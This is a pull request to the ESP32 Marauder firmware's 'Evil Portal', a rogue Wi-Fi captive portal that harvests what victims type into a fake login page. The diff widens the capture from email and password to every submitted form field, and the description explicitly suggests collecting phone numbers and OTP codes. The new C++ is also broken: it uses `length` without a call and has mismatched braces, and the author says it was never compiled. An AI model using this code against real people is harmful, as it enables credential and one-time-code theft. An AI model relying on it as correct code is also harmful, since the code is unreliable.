### PR TITLE
evil portal can manage more than two form field

### DIFF
--- a/esp32_marauder/EvilPortal.cpp
+++ b/esp32_marauder/EvilPortal.cpp
@@ -7,8 +7,7 @@ EvilPortal::EvilPortal() {
 
 void EvilPortal::setup() {
   this->runServer = false;
-  this->name_received = false;
-  this->password_received = false;
+  this->something_received = false;
   this->has_html = false;
   this->has_ap = false;
 
@@ -36,14 +35,6 @@ bool EvilPortal::begin(LinkedList<ssid>* ssids, LinkedList<AccessPoint>* access_
   return true;
 }
 
-String EvilPortal::get_user_name() {
-  return this->user_name;
-}
-
-String EvilPortal::get_password() {
-  return this->password;
-}
-
 void EvilPortal::setupServer() {
   server.on("/", HTTP_GET, [this](AsyncWebServerRequest *request) {
     request->send_P(200, "text/html", index_html);
@@ -54,22 +45,14 @@ void EvilPortal::setupServer() {
   });
 
   server.on("/get", HTTP_GET, [this](AsyncWebServerRequest *request) {
-    String inputMessage;
-    String inputParam;
-
-    if (request->hasParam("email")) {
-      inputMessage = request->getParam("email")->value();
-      inputParam = "email";
-      this->user_name = inputMessage;
-      this->name_received = true;
+    this->params_log = "";
+    int params = request->params();
+    for(int i=0; i < params; i++){
+        AsyncWebParameter* p = request->getParam(i);
+        this->params_log += p->name + ": " + p->value;
+        this->something_received = true;
     }
 
-    if (request->hasParam("password")) {
-      inputMessage = request->getParam("password")->value();
-      inputParam = "password";
-      this->password = inputMessage;
-      this->password_received = true;
-    }
     request->send(
       200, "text/html",
       "<html><head><script>setTimeout(() => { window.location.href ='/' }, 100);</script></head><body></body></html>");
@@ -321,18 +304,17 @@ void EvilPortal::sendToDisplay(String msg) {
 void EvilPortal::main(uint8_t scan_mode) {
   if ((scan_mode == WIFI_SCAN_EVIL_PORTAL) && (this->has_ap) && (this->has_html)){
     this->dnsServer.processNextRequest();
-    if (this->name_received && this->password_received) {
-      this->name_received = false;
-      this->password_received = false;
-      String logValue1 =
-          "u: " + this->user_name;
-      String logValue2 = "p: " + this->password;
-      String full_string = logValue1 + " " + logValue2 + "\n";
-      Serial.print(full_string);
-      this->addLog(full_string, full_string.length());
-      #ifdef HAS_SCREEN
-        this->sendToDisplay(full_string);
-      #endif
+    if (this->something_received) {
+      this->something_received = false;
+      
+      if (this->params_log.length)
+        this->params_log = this->params_log + "\n";
+        Serial.print(this->params_log);
+        this->addLog(this->params_log, this->params_log.length());
+        #ifdef HAS_SCREEN
+          this->sendToDisplay(this->params_log);
+        #endif
+      }
     }
   }
 }

--- a/esp32_marauder/EvilPortal.h
+++ b/esp32_marauder/EvilPortal.h
@@ -77,11 +77,9 @@ class EvilPortal {
 
   private:
     bool runServer;
-    bool name_received;
-    bool password_received;
+    bool something_received;
 
-    String user_name;
-    String password;
+    String params_log;
 
     bool has_html;
     bool has_ap;
@@ -108,8 +106,6 @@ class EvilPortal {
 
     LinkedList<String>* html_files;
 
-    String get_user_name();
-    String get_password();
     void setup();
     void addLog(String log, int len);
     bool begin(LinkedList<ssid>* ssids, LinkedList<AccessPoint>* access_points);


### PR DESCRIPTION
Hi, I'm a PHP Web Developer, and I've never written in C++. Recently, I've been experimenting with Marauder and FlipperZero, using Evil Portal for testing purposes. I noticed the limitation of two hardcoded form fields in the HTML files. Leveraging my web development knowledge and the documentation, I've tried to make this modification:

_The HTML form has N fields, each with its own name and respective value. When the /GET call is made, instead of selectively retrieving two specific fields with precise names, it iterates through all the parameters received from the form (through all the fields) saving in a single String variable the pair "name: value". This variable is then logged.
This not only allows us to be independent from "email" and "password", which could be named anything preferred by the creator of the HTML form, but also to add any additional fields such as name, surname, phone number, an OTP code, etc._

I'm not sure if I did it right because, at the moment, I'm unable to compile and physically test the code block I wrote on the board. In case I wrote something silly, I apologize. I would still like to know what you think and how it seems to you and if it could possibly be an effective and definitive modification. Thank you very much for any feedback.
